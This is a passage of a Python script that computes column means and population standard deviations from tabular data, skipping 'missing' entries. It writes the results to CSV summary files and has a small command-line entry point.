        tot = 0
        missing = 0
        for line in data:
            if not line[i+2] == "missing":
                tot += float(line[i+2])
            else:
                missing += 1
        # NOTE(review): raises ZeroDivisionError if every value in a
        # column is "missing"
        mean = tot/(len(data)-missing)
        means.append("{0:.4f}".format(mean))
        squared_deviations = 0
        for line in data:
            if not line[i+2] == "missing":
                squared_deviations += (float(line[i+2])-mean) ** 2
        # population standard deviation (divides by N, not N-1)
        std = math.sqrt(squared_deviations/(len(data)-missing))
        stds.append("{0:.4f}".format(std))
    with open(avgs_file, "w") as f:
        f.write(",".join(variables[2:]) + "\n")
        f.write(",".join(means) + "\n")
    with open(stds_file, "w") as f:
        f.write(",".join(variables[2:]) + "\n")
        f.write(",".join(stds) + "\n")
    with open(data_file, "w") as f:
        f.write("place," + ",".join(variables) + "\n")
        i = 0
        for line in data:
            f.write(places[i] + "," + ",".join(line) + "\n")
            i += 1

if __name__ == "__main__":
    # CLI usage: raw_file data_file avgs_file stds_file
    create_summary_files(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.